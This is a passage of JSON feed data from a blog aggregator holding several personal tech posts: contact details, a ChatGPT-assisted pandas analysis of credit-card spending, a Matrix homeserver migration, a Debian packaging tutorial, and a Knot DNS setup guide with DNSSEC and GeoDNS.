light.",[],{"slug":1305,"title":1306,"link":1307,"pubDate":1308,"contentSnippet":1309,"tags":1310,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"about","About Me","https:\u002F\u002Fshrirangkahale.com\u002Fabout\u002F","Sat, 06 May 2023 00:00:00 +0000","I’m a 19 y\u002Fo who has a strong interest in Networking, DevOps, Aviation, RF and technology in general. I’m also experienced in working with Linux-based servers and enjoy tinkering with them to improve my skills.\nI am a believer of the free software philosophy and I contribute to FOSS by hosting a distributed mirror service (mirror.albony.in) which serves more than 20TB of traffic per day.\nI go by the alias “albony” \u002F “albonycal” on the internet.",[],{"slug":1312,"title":1313,"link":1314,"pubDate":1308,"contentSnippet":1315,"tags":1316,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"contact","Contact Me","https:\u002F\u002Fshrirangkahale.com\u002Fcontact\u002F","You can contact me via any of the following ways: Email: me@shrirangkahale.com\nTwitter: twitter.com\u002Falbonycal\nTelegram: @shrirangkahale\nMastodon: @albonycal@fosstodon.org Discord: @albony or Albony#1335\nMatrix: @albonycal:matrix.org\nSignal: shrirangkahale.1337\nLinkedIn: linkedin.com\u002Fin\u002Fshrirangkahale",[],{"slug":1318,"title":1319,"link":1320,"pubDate":1321,"contentSnippet":1322,"tags":1323,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"airtel-vi-routing","Another Case Of Bad Routing: Vi and Airtel","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fairtel_vi_routing\u002F","Mon, 01 May 2023 09:53:15 +0000","Even though Bharti Airtel (AS9498) is an upstream of Vodafone Idea (Vi) the routing between the two ISPs is consistently bad. While this heavily affects P2P traffic, it also has other impacts. ➜ VoWiFi (Voice Over WiFi) is very useful for places which have poor cellular coverage, But due to the horrible routing between the two ISPs the VoWiFi experience is bad. When I use VoWiFi (Vi SIM) on Airtel Broadband connection, there are constant call drops and stuttering.",[],{"slug":1325,"title":1326,"link":1327,"pubDate":1328,"contentSnippet":1329,"tags":1330,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"analyzing-credit-card-transactions","Analyzing credit card transactions with GPT and Python","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fanalyzing-credit-card-transactions\u002F","2023-04-30T07:08:02.000Z","You know those budget freaks? People who log and categorise every Rupee they’ve spent over the month? The financially sane people? I am definitely not one and I suck at it.\nI moved cities a couple of months back and had some big ticket spends off late, mostly financed by credit card. I wanted an easy way to list down where all I’ve spent most money and spot some recurring expenses so I can be better prepared for them from next month. I’ve found that broadly keeping an idea of things where you spend money works for me (v\u002Fs the two extremes - completely blind or logging every small transactions). Of course I know people who make budgeting a habit but I only wish I was consistent enough to do that.\nAnyway, I downloaded the statement in CSV format from my bank.\nInitially I thought I’d use some simple Excel to make sense of this but I realised how bad my Excel skills really are. I got an idea to dump the CSV file to ChatGPT (yay privacy) and ask questions. It kinda sucked at it and gave wrong answers for a lot of questions and also started to hallucinate data which wasn’t even present in the CSV.\nThe next most obvious step would be to write a simple script and parse it. I wanted to experiment if ChatGPT could do this entire exercise of writing the script and the relevant code for the analysis I wanted to perform.\nHere’s the initial prompt I gave:\nI am pasting a CSV file which also includes the first row as header. Write Python code to parse this:\n\n,,Transaction Date,Details,,,Amount (INR),,,Reference Number,,\n,,27\u002F04\u002F2023,\"Blinkit, BANGALORE, IN\",,,290.00 Dr.,,,7477468633,,\n... other data ...\nIt returned the following code:\nimport pandas as pd\nfrom io import StringIO\n\ncsv_data = \"\"\"\\\n,,Transaction Date,Details,,,Amount (INR),,,Reference Number,,\n,,27\u002F04\u002F2023,\"Blinkit, BANGALORE, IN\",,,290.00 Dr.,,,747746xxxx,,\n# ... (the rest of your CSV data)\n,,03\u002F04\u002F2023,\"DIGITAL LOUNGE, GURGAON, IN\",,,799.00 Dr.,,,738201xxx,,\"\"\"\n\n# Read the CSV data into a pandas DataFrame\ndata = StringIO(csv_data)\ndf = pd.read_csv(data, header=1)\n\n# Clean up the DataFrame (remove unnecessary columns)\ndf = df.dropna(axis=1, how=\"all\")\n\n# Rename columns\ndf.columns = [\n    \"Transaction Date\",\n    \"Details\",\n    \"Amount (INR)\",\n    \"Reference Number\"\n]\n\nprint(df)\nLooking at this, I was a bit impressed as it figured the CSV contains some useless empty columns and it removed (without me giving any information about it).\nI also asked it to modify the code to read the file locally from disk and it swapped StringIO with the path to CSV file:\n# Provide the file path to your local CSV file\nfile_path = \"your_file.csv\"\n\n# Read the CSV data into a pandas DataFrame\ndf = pd.read_csv(file_path, header=1)\n\nNext, I prompted to do some analysis on it:\nWrite some more code to do the analysis to answer these questions:\n\n- How many total debit and credit entries\n- What is the total amount of debits and total amount of credits\n- Which vendor have I spent the most?\n- How much have I spent on `SWIGGY` ?\nIt returned some one-liners to answer each question:\n# Filter debit and credit entries\ndebit_entries = df[df[\"Amount (INR)\"] > 0]\ncredit_entries = df[df[\"Amount (INR)\"] \u003C 0]\n\n# Count the total number of debit and credit entries\ntotal_debit_entries = len(debit_entries)\ntotal_credit_entries = len(credit_entries)\n\n# Calculate the total amount of debits and credits\ntotal_debit_amount = debit_entries[\"Amount (INR)\"].sum()\ntotal_credit_amount = credit_entries[\"Amount (INR)\"].sum()\n\n# Find the vendor with the most spending\nmost_spent_vendor = debit_entries.groupby(\"Details\")[\"Amount (INR)\"].sum().idxmin()\n\n# Calculate the total amount spent on SWIGGY\nswiggy_spending = debit_entries[debit_entries[\"Details\"].str.contains(\"SWIGGY\", case=False)][\"Amount (INR)\"].sum()\n\n# Calculate the total amount spent on AMAZON RECHARGES\namazon_recharges_spending = debit_entries[debit_entries[\"Details\"].str.contains(\"AMAZON RECHARGES\", case=False)][\"Amount (INR)\"].sum()\n\n# Print the results\nprint(f\"Total debit entries: {total_debit_entries}\")\nprint(f\"Total credit entries: {total_credit_entries}\")\n\nprint(f\"Total debit amount: {total_debit_amount}\")\nprint(f\"Total credit amount: {total_credit_amount}\")\n\nprint(f\"Vendor with the most spending: {most_spent_vendor}\")\n\nprint(f\"Total amount spent on SWIGGY: {swiggy_spending}\")\nAt this point, I know that this will fail because we’ve not cleaned up the data. The column Amount (INR) needs cleaning up. I prompted ChatGPT to write a function to clean this column:\nThe amount column as `21,620.54 Dr.` to represent that Rs 21,620.54 is debited. And `73,500.00 Cr.` to represent that Rs 73,500.00 is credited. Can you write a function to apply this transformation on the `Amount (INR)` column?\nIt responded with:\n# Clean up the data\ndef clean_amount(value):\n    if ' Cr.' in value:\n        value = value.replace(' Cr.', '')\n        return -float(value.replace(',', ''))\n    elif ' Dr.' in value:\n        value = value.replace(' Dr.', '')\n        return float(value.replace(',', ''))\n\ndf[\"Amount (INR)\"] = df[\"Amount (INR)\"].apply(clean_amount)\n\n# Now proceed with the analysis code\n\nPerfect! After transforming the amounts, I ran the analysis code:\n\nThe next prompt I gave was to analyse the spending in various categories.\nIn the above CSV file can you guess the categories of each merchant based on the `Details`? And write the code for grouping the spends on various categories. If you're unable to figure out the category for the transaction, you can use a \"Misc\" column to bucket them.\nIt actually did an okayish job at this and ignored a lot of vendors which I think it could have guessed easily:\ndef categorize(details):\n    details = details.lower()\n    if \"swiggy\" in details:\n        return \"Food Delivery\"\n    elif \"amazon recharges\" in details:\n        return \"Recharge\"\n    elif \"uber\" in details or \"ola\" in details:\n        return \"Cab\"\n    elif \"zomato\" in details:\n        return \"Food Delivery\"\n    elif \"netflix\" in details or \"prime video\" in details:\n        return \"Streaming\"\n    else:\n        return \"Misc\"\n\n# Create a new column called \"Category\" by applying the categorize function to the \"Details\" column\ndf[\"Category\"] = df[\"Details\"].apply(categorize)\n\n# Group the transactions by category and calculate the total amount spent in each category\ngrouped = df[df[\"Amount (INR)\"] > 0].groupby(\"Category\")[\"Amount (INR)\"].sum()\n\nprint(grouped)\nI decided to give some manual inputs to it to refine the function.\nI can help you with categorising it further.\n`Blink` -  Grocery\n`Indigo` - Travel\n`PEGS` - Alcohol\n`Nike` - Shopping\n\nAlso note that the cateorgy name matching should be case-insensitive.\nAnd it modified the Python snippet to add these rules.\n\nMixed reactions looking at this. Happy that I could practically get exactly the result I had in mind in just 10 minutes without writing any code. Sad because damn I need to limit those empty calories from next month (famous last words).\nNext, I wanted to see if my spends on weekends are higher or not. (I don’t expect them to be, but you never know).\nPrompt:\nCan you also write the code to figure how much spends I've done grouped by the day of week?\nResponse:\n# Convert the 'Transaction Date' column to a datetime format\ndf['Transaction Date'] = pd.to_datetime(df['Transaction Date'])\n\n# Create a new column called \"Day of Week\" containing the day of the week for each transaction\ndf['Day of Week'] = df['Transaction Date'].dt.day_name()\n\n# Group the transactions by the \"Day of Week\" and calculate the total amount spent on each day of the week\ngrouped_by_day = df[df[\"Amount (INR)\"] > 0].groupby('Day of Week')['Amount (INR)'].sum().abs()\n\n# Sort the grouped data by the total amount spent in descending order\nsorted_grouped_by_day = grouped_by_day.sort_values(ascending=False)\n\nprint(sorted_grouped_by_day)\n\nIt was a fun 10-15 min exercise to figure out my spending habits based on the last month’s statement. I intend to do this for the next couple of months and then it would make sense to write more queries which would show trend-lines of spends in various categories over time.\nHonestly, I just loved how ChatGPT made this task so seemingly simple. It’s not that I can’t myself write the code for these kind of simple analysis. It’s the sheer power at your hand to go from ideation phase to answer within seconds. And I think that’s why I love it so much. I didn’t have to go through Pandas docs (because I don’t use that in my day job so it’s quite normal to not know various syntax\u002Ffunctions that I could use) and I’d grok through different StackOverflow questions to achieve what I wanted to. And maybe imagining all this resistance on a Sunday morning would have meant that I never got to write the script in the first place.\nFin!",[],{"slug":1332,"title":1333,"link":1334,"pubDate":1335,"contentSnippet":1336,"tags":1337,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"02-mdad-html","How we migrated Project Segfault’s matrix homeserverto matrix-docker-ansible-deploy","https:\u002F\u002Faryak.me\u002Fblog\u002F02-mdad.html","Mon, 17 Apr 2023 12:39:46 +0000","Yesterday, we completed Project Segfault’s migration from\nmatrix.org’s official docker image for synapse to\nmatrix-docker-ansible-deploy.\nThis was because of how much of a pain it is to setup workers,\nespecially with docker. The docs aren’t great about it either..\nFor these reasons, we turned to matrix-docker-ansible-deploy.\nThe first issue we encountered was how spread out the docs were,\nthough very precise and well-explained.\nOnce we cloned the repo, we first had to setup the inventory hosts\nfile.\nSince we cloned the repo to the DockerVM itself, we had a weird\nsolution for this.\n[matrix_servers]\nmatrix.projectsegfau.lt ansible_host=localhost ansible_ssh_user=root\nAfter this, we had to add the pubkey of the VM to its own\nauthorized_keys. Wacky :P\nWith that sorted, we had to start configuring.\nFirstly, we had to prevent it from installing docker.\nThis is important since (re)installing docker will break a lot,\nespecially for our pre-existing services.\nmatrix_playbook_docker_installation_enabled: false\nAfter that, we had to add our old secret keys back to the config file\nso that it won’t break federation:\nmatrix_synapse_macaroon_secret_key: \"xxx\"\nmatrix_synapse_registration_shared_secret: \"xxx\"\nmatrix_synapse_form_secret: \"xxx\"\nThe signing key had to be re-added as well, but later after the setup\nwas complete.\nAfter that, we turned to the thing we migrated for, synapse\nworkers:\nSince the generic and federation_sender workers have to process a lot\nof data, we made 4 of each (totally didn’t copy the number from envs.net\n:P).\nmatrix_synapse_workers_enabled: true\nmatrix_synapse_workers_preset: one-of-each\nmatrix_synapse_workers_federation_sender_count: 4\nmatrix_synapse_workers_generic_worker_count: 4\nAnother important thing we had to take into consideration was\npostgres. We ran postgres on a separate VM and connected to the database\non it.\nmatrix_synapse_database_host: \"192.168.5.4\"\nmatrix_synapse_database_user: \"synapse\"\nmatrix_synapse_database_password: \"xxx\"\nmatrix_synapse_database_database: \"synapse\"\ndevture_postgres_enabled: false\nAfter the database, we had to set up registration\u002Flogin stuff.\nA weird thing I noticed about matrix-docker-ansible-deploy’s email\nconfiguration is that it uses its own relay, above our mail\ncredentials.\nmatrix_mailer_sender_address: \"matrix@projectsegfau.lt\"\nmatrix_mailer_relay_use: true\nmatrix_mailer_relay_host_name: \"mail.projectsegfau.lt\"\nmatrix_mailer_relay_host_port: 587\nmatrix_mailer_relay_auth: true\nmatrix_mailer_relay_auth_username: \"matrix@projectsegfau.lt\"\nmatrix_mailer_relay_auth_password: \"xxx\"\nmatrix_synapse_registrations_require_3pid: [ email ]\nmatrix_synapse_enable_registration: true\nmatrix_synapse_configuration_extension_yaml: |\n  oidc_providers:\n    - idp_id: authentik\n      idp_name: \"authentik\"\n      idp_icon: \"mxc:\u002F\u002Fenvs.net\u002F429bd4b307d32b919a94823f03acc7c24a7da61f\"\n      discover: true\n      issuer: \"https:\u002F\u002Fauth.p.projectsegfau.lt\u002Fapplication\u002Fo\u002Fmatrix\u002F\"\n      client_id: \"xxx\"\n      client_secret: \"xxx\"\n      scopes:\n        - \"openid\"\n        - \"profile\"\n        - \"email\"\n      user_mapping_provider:\n        config:\n          localpart_template: \"{% raw %}{{ user.preferred_username }}{% endraw %}\"\n          display_name_template: \"{% raw%}{{ user.name }}{% endraw %}\"\n          email_template: \"{% raw %}{{ user.email }}{% endraw %}\"\nPast this, we also had to port the small configurations we had in our\nold homeserver.yaml to the ansible format.\nSince most of these weren’t documented very well, we had to make\nheavy use of the defaults\nfile.\nmatrix_synapse_auto_join_rooms: [ '#project-segfault:projectsegfau.lt', '#support:projectsegfau.lt', '#general:projectsegfau.lt', '#announcements:projectsegfau.lt' ]\nmatrix_synapse_max_upload_size_mb: 700\nmatrix_synapse_allow_public_rooms_without_auth: true\nmatrix_synapse_allow_public_rooms_over_federation: true\nmatrix_synapse_email_client_base_url: \"https:\u002F\u002Fmatrix.to\"\nmatrix_synapse_email_invite_client_location: \"https:\u002F\u002Fchat.projectsegfau.lt\"\nmatrix_synapse_turn_uris: [\"turn:turn.projectsegfau.lt?transport=udp\", \"turn:turn.projectsegfau.lt?transport=tcp\"]\nmatrix_synapse_turn_shared_secret: \"xxx\"\nmatrix_synapse_turn_allow_guests: true\nmatrix_coturn_enabled: false\nmatrix_client_element_enabled: false\nAt this point we realized that we need to do a lot of weirder stuff\nto get it to work reverse-proxied behind our main caddy instance.\nWe reverse-proxied the traefik instance behind our caddy instance, as\nrecommended by the documentation\nwith the instructions there:\n# Ensure that public urls use https\nmatrix_playbook_ssl_enabled: true\n\n# Disable the web-secure (port 443) endpoint, which also disables SSL certificate retrieval\ndevture_traefik_config_entrypoint_web_secure_enabled: false\n\n# If your reverse-proxy runs on another machine, consider using `0.0.0.0:81`, just `81` or `SOME_IP_ADDRESS_OF_THIS_MACHINE:81`\ndevture_traefik_container_web_host_bind_port: '0.0.0.0:81'\n\n# We bind to `127.0.0.1` by default (see above), so trusting `X-Forwarded-*` headers from\n# a reverse-proxy running on the local machine is safe enough.\ndevture_traefik_config_entrypoint_web_forwardedHeaders_insecure: true\ndevture_traefik_additional_entrypoints_auto:\n  - name: matrix-federation\n    port: 8449\n    host_bind_port: '0.0.0.0:8449'\n    config: {}\nAfter all the configuration was done, we had to run it :P.\nFirstly, we had to install ansible and just, and run\njust roles to initialize all the ansible stuff.\nAt this point, we shut down our old matrix instance in order to not\ncause any issues.\nThen, we ran\nansible-playbook -i inventory\u002Fhosts setup.yml --tags=install-all\nto install all the files but not start the services.\nNow came the most time consuming part, importing the old media repo.\nConsidering its size at over 85 gigabytes.\nansible-playbook -i inventory\u002Fhosts setup.yml --extra-vars='server_path_media_store=\u002Fopt\u002Fdocker\u002Fmtrx\u002Ffiles\u002Fmedia_store' --tags=import-synapse-media-store\nThis took almost 30 minutes, the majority of the downtime we\nhad..\nAfter this was done, we were able to start the server:\nansible-playbook -i inventory\u002Fhosts setup.yml --tags=start.\nThe nginx\nconfiguration they recommended in the documentation for our\nreverse-proxy setup was pretty self-explanatory and easy to convert, but\nfor the fact that till now our matrix instance used normal delegation\nand did not make use of :8448.\nDue to this, we had to waste a lot of time trying to figure out which\nroutes went to which ports. I wish the documentation explained this\nbetter..\nAt the end, this was the caddy configuration we came up with for\nthis:\nmatrix.projectsegfau.lt {\n    reverse_proxy \u002F_matrix\u002F* 192.168.5.2:8449\n    reverse_proxy \u002F_matrix\u002Fclient\u002F* 192.168.5.2:81\n    reverse_proxy \u002F_synapse\u002F* 192.168.5.2:81\n}\nThis configuration works right now, though we are still not\ncompletely sure if other routes need to go somewhere else.\nI do have some gripes with it though, such as the ages it takes for\nrestarts (–tags=setup-build and then –tags=restart for those wondering)\nand the lack of documentation for what is the recommended upstream\ndelegation configuration.\nAt the end, matrix-docker-ansible-deploy simplified our config a lot\nand relieved a lot of maintanence burden we would have had in case we\nconfigured it manually and I am thankful for that.",[1338],"2023\u002F04\u002F17\u002F1",{"slug":1340,"title":1341,"link":1342,"pubDate":1343,"contentSnippet":1344,"tags":1345,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-23","Cold restart whole system after total outage","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fcold-restart-total-outage\u002Findex.html","Fri, 07 Apr 2023 00:00:00 +0000","\"What are folks’ views on systems so large where cold-starting the whole system is almost impossible?\"... — M'colleague, Shivam, In A Slackroom Next Door.",[49,723,1346,55],"complexity",{"slug":1348,"title":1349,"link":1350,"pubDate":1351,"contentSnippet":1352,"tags":1353,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"debian-packaging-removing-git-from-gemspec","Debian Packaging Tutorial: Removing Git From Gemspec","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fdebian-packaging-removing-git-from-gemspec\u002F","Wed, 05 Apr 2023 01:48:53 +0530","Recently, I was packaging silent_stream for Debian. sbuild was showing error because there was git in gemspec file. Specifically, this line\n`git ls-files -z`.split(\"\\x0\").reject { |f| f.match(%r{^(tests|spec|features)\u002F}) }\n\nin this file.\nThanks to Vinay who helped me in fixing this. It took some time and it is common to run into this error, I was told. So, I am documenting what worked for me.\nWe will use quilt and Rapahel has written a good article on how to use it to patch. You will need to setup quilt first which is explained in the article.\n—————Run all these commands in debian unstable environment—————————–\nSince I had already pushed my changes to salsa.debian.org, I had to clone the repository. We do this by using:\ngbp clone --pristine-tar git@salsa.debian.org:ruby-team\u002Fruby-silent-stream.git\ncd into the repository just cloned\ncd ruby-silent-stream\nNow, insert a new empty patch\nquilt new remove-git-in-gemspec.patch\nTell quilt that you intend to modify files\nquilt add remove-git-in-gemspec.patch\nEdit the file which requires to be fixed. In our case it is silent_stream.gemspec file\nvim silent_stream.gemspec\nDelete lines 50,51,52 in this file\nReplace those lines with:\nspec.files = Dir.glob(\"**\u002F*\")\nand save the file.\nTo generate the patch, run\nquilt refresh\nAdd metadata to your patch header\nquilt header --dep3 -e\nAdd debian\u002Fpatches directory to git staging area:\ngit add debian\u002Fpatches\nRestore gemspec file.\ngit restore silent_stream.gemspec\nRun debclean\ndebclean\nBefore running sbuild, I had to import tar files in parent directory\nuscan --verbose -dd --download-current-version\nCheck if sbuild is successful.\nsbuild -d unstable (where to run this command depends on how you setup sbuild and your debian unstable)\n—————–Run above commands in debian unstable environment————\nIf the sbuild was successful, then commit and push your changes. I usually commit in my host system as signing the commits does not work for me inside chroot or the unstable environment I setup using systemd-nspawn.\ngit commit -S -m \"add remove-git-in-gemspec.patch\"\n\nSo, that’s it for this tutorial. Meet you in the next post.",[],{"slug":1355,"title":1356,"link":1357,"pubDate":1358,"contentSnippet":1359,"tags":1360,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"important-question-not-asked-prav","Nobody asked this important question about Prav","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fimportant-question-not-asked-prav\u002F","Fri, 24 Mar 2023 13:35:25 +0530","Earlier this month, I gave a presentation introducing Prav along with my friend Arun. Many people got curious and asked various questions about the project. However, I was surprised that nobody inquired about the operation of a privacy messaging service in India, especially considering the weakening privacy laws in the country as highlighted in this article.\nThe conference where I presented had at least two talks\u002Fdiscussions on the policy\u002Flaw aspects of technology. Even outside the conference, I did not encounter this question, which I believe is crucial. It seems that people are not yet fully aware of the implications of the new IT rules.\nUpdate on 27 May 2023: This question was later raised on social media, reminding me of a similar question asked here before I wrote this post.",[],{"slug":1362,"title":1363,"link":1364,"pubDate":1365,"contentSnippet":1366,"tags":1367,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"01-knot-html","Setting up Knot DNS - DNSSEC, GeoDNS, RFC2136,authenticated zonefile sync and more!","https:\u002F\u002Faryak.me\u002Fblog\u002F01-knot.html","Wed, 01 Mar 2023 12:39:46 +0000","Knot DNS is one of the easier to\nsetup authoritative dns servers out there, made by NIC.CZ.\nIn this tutorial I’ll show how to setup Knot with DNSSEC,\nauthenticated master -> slave sync, RFC2136 (for automatic dns-based\ncerts in caddy and such) and GeoDNS, which makes the server give an IP\nclosest to the user.\nI assume you have two Debian based systems, with port 53 (tcp+udp)\nforwarded.\nInstalling Knot\nThis guide covers debian, but instructions for other distributions\ncan be found on the download\npage Run the following on both the master and the slave:\napt-get -y install apt-transport-https lsb-release ca-certificates wget\nwget -O \u002Fusr\u002Fshare\u002Fkeyrings\u002Fknot.gpg https:\u002F\u002Fdeb.knot-dns.cz\u002Fapt.gpg\nsh -c 'echo \"deb [signed-by=\u002Fusr\u002Fshare\u002Fkeyrings\u002Fknot.gpg] https:\u002F\u002Fdeb.knot-dns.cz\u002Fknot-latest\u002F $(lsb_release -sc) main\" > \u002Fetc\u002Fapt\u002Fsources.list.d\u002Fknot-latest.list'\napt-get update\napt-get install knot knot-dnsutils\n\nBasic Configuration\nknot.conf\nNow, to add in the basic configuration, overwrite the\n\u002Fetc\u002Fknot\u002Fknot.conf file on the master with the following\ntext:\nserver:\n    rundir: \"\u002Frun\u002Fknot\"\n    user: knot:knot\n    listen: 0.0.0.0@53\nlog:\n  - target: syslog\n    any: info\ndatabase:\n    storage: \"\u002Fvar\u002Flib\u002Fknot\"\nremote:\n  - id: secondary\n    address: your.other.servers.ip@53\nacl:\n  - id: acl_secondary\n    address: your.other.servers.ip\n    action: transfer\ntemplate:\n  - id: default\n    storage: \"\u002Fetc\u002Fknot\u002Fzones\"\n    file: \"%s.zone\"\n    semantic-checks: on\n    # Don't override zonefile\n    zonefile-sync: -1\n    zonefile-load: difference-no-serial\n    journal-content: all\nzone:\n  - domain: your.domain\n    notify: secondary\n    acl: acl_secondary\nOn the slave, overwrite the same file with the following text:\nserver:\n    rundir: \"\u002Frun\u002Fknot\"\n    user: knot:knot\n    listen: 0.0.0.0@53\nlog:\n  - target: syslog\n    any: info\ndatabase:\n    storage: \"\u002Fvar\u002Flib\u002Fknot\"\nremote:\n  - id: primary\n    address: your.main.servers.ip@53\nacl:\n  - id: acl_primary\n    address: your.main.servers.ip\n    action: notify\ntemplate:\n  - id: default\n    storage: \"\u002Fetc\u002Fknot\u002Fzones\"\n    file: \"%s.zone\"\nzone:\n  - domain: your.domain\n    master: primary\n    acl: acl_primary\nZonefile\nAt this point you need to create \u002Fetc\u002Fknot\u002Fzones on both\nthe master and slave as that is where the zonefiles will be stored. Now\ncreate a file named your.domain.zone in the directory on the master\nalone and add the following text to it:\n$ORIGIN your.domain. ; 'default' domain as FQDN for this zone\n$TTL 3600 ; default time-to-live for this zone\n\nyour.domain.   IN  SOA     ns1.your.domain. ns2.your.domain. (\n        YYYYMMDD01  ;Serial\n        14400       ;Refresh\n        3600        ;Retry\n        1209600     ;Expire\n        3600        ;Negative response caching TTL\n)\n@   IN  NS  ns1.your.domain.\n@   IN  NS  ns2.your.domain.\nns1 A   your.main.servers.ip\nns2 A   your.other.servers.ip\n@   A   your.main.servers.ip\n\n; PTR Records (for mailservers)\nyour.ip.in.reverse.in-addr.arpa.    PTR mail.your.domain.\nAt this point, you can run systemctl restart knot\n(restart since its a major change) on both nodes.\nUpdating the zonefile\nUpdating the zonefile is not hard.\nSince we set the zonefile-load to\ndifference-no-serial, we do not need to increment the\nserial as it will automatically be computed when\nknotc reload is run.\nAll records must be before the PTR in the zonefile.\nWildcards can be done with the hostname as *\nIf the hostname ends with ., it must include your.domain, that is\nsomething.your.domain will be something.your.domain.\nIf the hostname does not end with a ., it is relative to the domain,\nthat is something.your.domain will just be something.\nAlways use tabs, not spaces.\nToken-based zonefile\nauthentication\nAt the moment, the authentication for sending and receiving the\nzonefile is completely based on the IP address, which is not very\nsecure.\nTo remediate this, we can use token-based authentication.\nFirst, you need to generate a key with\nkeymgr -t zonesync hmac-sha256\nThis is the key that will authenticate the zone transfers.\nYou can copy-paste the output it gives you into your knot.conf, above\nthe remote section on both master and slave.\nNow, you need to add key: zonesync to the remote,\nacl_primary\u002Fsecondary sections on both master and slave.\nAt this point, you can run systemctl restart knot, and\nall the syncs will be more secure!\nDNSSEC\nDNSSEC is an extension to DNS designed to protect applications using\nDNS from accepting forged or manipulated DNS data by using zone\nsigning.\nEnabling DNSSEC on knot is as simple as adding the following line to\nthe template section:\ntemplate:\n    ...\n    dnssec-signing: on\n    ...\nAt this point, you need to upload the DS record to your Registry.\nThis is usually done through your registrar’s WebUI.\nThe DNSSEC-enabled DNS servers use the DS record from your domain\nregistry to validate your records.\nYou can get your DS record with the following command:\nkeymgr your.domain ds\n\nThe output will look something like this:\n54674 13 2 E28E3DB78E5517A577353A43799AD14EC044720BAE4906D134F5EA40 74AC0287\nIn the example given:\nKey tag - 54674\nAlgorithm - 13\nDigest Type - 2\nDigest - E28E3…287 (omit space)\nOn namecheap, you add this at Advanced DNS -> DNSSEC\nYou can check if your DNSSEC is working properly at DNSViz and DNSSEC-Analyzer.\nRFC2136\nRFC2136 is an\nRFC that allows dynamic updates for DNS.\nThis works completely over DNS and does not require a special\nAPI.\nTo set it up, you need to create an ACL as follows:\nacl:\n    ...\n    - id: acl_dynupdates\n    address: [an.authorized.ip.addr, another.authorized.ip.addr]\n    action: update\n...\nzone:\n  - domain: your.domain\n    notify: secondary\n    acl: [acl_secondary, acl_dynupdates]\nYou can also add token-based auth by generating another key with\nkeymgr -t rfc2136 hmac-sha256\nYou can add it to the config as follows:\nkey:\n    ...\n    - id: rfc2136\n    algorithm: hmac-sha256\n    secret: xxx\n...\nacl:\n    ...\n    - id: acl_dynupdates\n    address: [an.authorized.ip.addr, another.authorized.ip.addr]\n    action: update\n    key: rfc2136\nAfter this, you can run systemctl restart knot to apply\nthe changes.\nCaddy\nCaddy is a modern webserver\nwhich supports automatic cert generation from letsencrypt\u002Fzerossl with\nacme.\nIt uses http-01 for the challenge by default, but can use a dns\nchallenge too.\nFor the DNS challenge, you first need to install the RFC2136 DNS plugin with\nthe following command:\nxcaddy build --with github.com\u002Fcaddy-dns\u002Frfc2136@master\n\nNow, add the following lines to the top of your caddyfile\n{\n    acme_dns rfc2136 {\n        key_name \"rfc2136\"\n        key_alg \"hmac-sha256\"\n        key \"xxx\"\n        server \"your.main.servers.ip:53\"\n    }\n    acme_ca https:\u002F\u002Facme-v02.api.letsencrypt.org\u002Fdirectory\n}\nNow, all certs can be generated using the DNS challenge!\nThis is especially useful in a GeoDNS environment.\nGeoDNS\nGeoDNS allows geographical split horizon based on a GeoIP database,\nsuch as Maxmind’s free GeoLite2.\nFirstly, you need to procure the GeoLite2 database from Maxmind.\nDue to policy changes, you now need to signup on Maxmind’s website in\norder to get access.\nHowever, older GeoIP DBs can still be found in many places, including\ndistribution package repositories.\nOnce you procure your copy of GeoLite2, you need to install the GeoIP\nmodule for knot-dns on both master and slave.\nOn Debian, the package’s name is knot-module-geoip\nAfter installing the module, you can add it to the knot.conf (must be\nbefore zone section however):\nmod-geoip:\n  - id: geo \n    config-file: \"\u002Fetc\u002Fknot\u002Fgeo.conf\"\n    mode: geodb\n    geodb-file: \"\u002Fvar\u002Flib\u002Fknot\u002FGeoLite2-City.mmdb\"\n    geodb-key: [ continent\u002Fcode, country\u002Fiso_code, city\u002Fnames\u002Fen ]\nYou also need to include the GeoIP module for your domain. You can do\nthat by adding this line to your domain’s zone section:\nzone:\n    - domain: your.domain\n      ...\n      module: mod-geoip\u002Fgeo\nNow, you need to configure the GeoDNS.\nTo do so, create a file called \u002Fetc\u002Fknot\u002Fgeo.conf with\nthe following:\ngeodnsubdom.your.domain:\n  - geo: \"*;*;*\" # Fallback incase DNS server doesn't send ECS\n    A: your.main.servers.ip\n    TXT: \"Worldwide\"\n  - geo: \"EU;*;*\" # Europe\n    A: your.europe.servers.ip\n    TXT: \"Europe\"\n    ...\nHowever, the file needs to be manually synced to the slave on every\nupdate.\nIt is also painful to use if you have multiple root subdomains you\nwant to use GeoDNS with.\nDue to these reasons, I made a kinda hacky script to remediate\nthis:\n#!\u002Fusr\u002Fbin\u002Fenv bash\ngeoconf=\u002Fetc\u002Fknot\u002Fgeo.conf\nremote='geodns@other.servers.ip'\nprintf '' > $geoconf\nfor i in $(\u003C\u002Fetc\u002Fknot\u002Fgeodnsdomains); do\n    cat \u002Fetc\u002Fknot\u002Fgeodnstemplate >> $geoconf\n    sed -i \"s\u002FREPLACEME\u002F${i}\u002F\" $geoconf\ndone\nscp $geoconf \"${remote}\":\u002Fvar\u002Fgeo.conf\nssh $remote \"sudo systemctl restart knot\"\nsystemctl restart knot\n\nIn order to allow the unprivileged user on the slave to restart knot,\nI used a sudo ALLOW_CMDS flag:\nCmnd_Alias KNOT_CMDS = \u002Fusr\u002Fbin\u002Fsystemctl restart knot\ngeodns ALL=(ALL) NOPASSWD: KNOT_CMDS\nAnd thats it. Thanks for reading!",[1368],"2023\u002F03\u002F01\u002F3",{"slug":1370,"title":1371,"link":1372,"pubDate":1373,"contentSnippet":1374,"tags":1375,"maintainerName":130,"maintainerUsername":131,"maintainerPhoto":132,"feedUrl":133},"blog-open-source-sustainability","The complicated road to Open Source 